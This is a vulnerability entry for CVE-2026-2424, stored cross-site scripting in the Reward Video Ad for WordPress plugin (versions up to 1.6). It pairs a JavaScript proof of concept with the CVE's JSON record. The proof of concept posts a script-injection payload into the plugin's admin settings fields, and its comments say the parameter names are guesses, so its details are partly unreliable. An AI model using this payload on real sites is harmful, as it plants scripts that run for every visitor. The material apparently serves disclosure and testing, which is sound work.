CVE-2026-2424

<!-- PoC for CVE-2026-2424 Stored XSS --> <!-- Target: Reward Video Ad for WordPress <= 1.6 --> <!-- Preconditions: Administrator access required --> <script> // Function to simulate the XSS payload injection function exploit() { // Malicious payload to be stored var payload = '"><script>alert(1)<\/script>'; // The vulnerable parameter based on the description (e.g., message before video) var params = new URLSearchParams(); params.append('action', 'save_settings'); params.append('applixir_message_before_video', payload); // Example parameter name params.append('account_id', payload); // Sending the request to the WordPress admin interface fetch('/wp-admin/admin.php?page=reward-video-ad-settings', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: params }).then(response => { console.log('Payload injected. Visit the settings page to trigger XSS.'); }); } // Note: This must be executed in the context of the WP Admin dashboard exploit(); </script>

{"cve": {"id": "CVE-2026-2424", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:16:59.067", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Reward Video Ad for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.6. This is due to insufficient input sanitization and output escaping on plugin settings such as the 'Account ID', 'Message before the video', and color fields. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Reward Video Ad for WordPress para WordPress es vulnerable a cross-site scripting almacenado a través de la configuración de administrador en todas las versiones hasta la 1.6, inclusive. Esto se debe a una sanitización de entrada y un escape de salida insuficientes en la configuración del plugin, como los campos 'Account ID', 'Message before the video' y de color. Esto hace posible que atacantes autenticados, con acceso de nivel de Administrador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/applixir/tags/1.6/inc/class-applixir-restriction.php#L80", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/applixir/tags/1.6/inc/settings.php#L665", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/applixir/trunk/inc/class-applixir-restriction.php#L80", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/applixir/trunk/inc/settings.php#L665", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/40b5a241-3cf4-476c-8fd9-d0b953234d39?source=cve", "source": "[email protected]"}]}}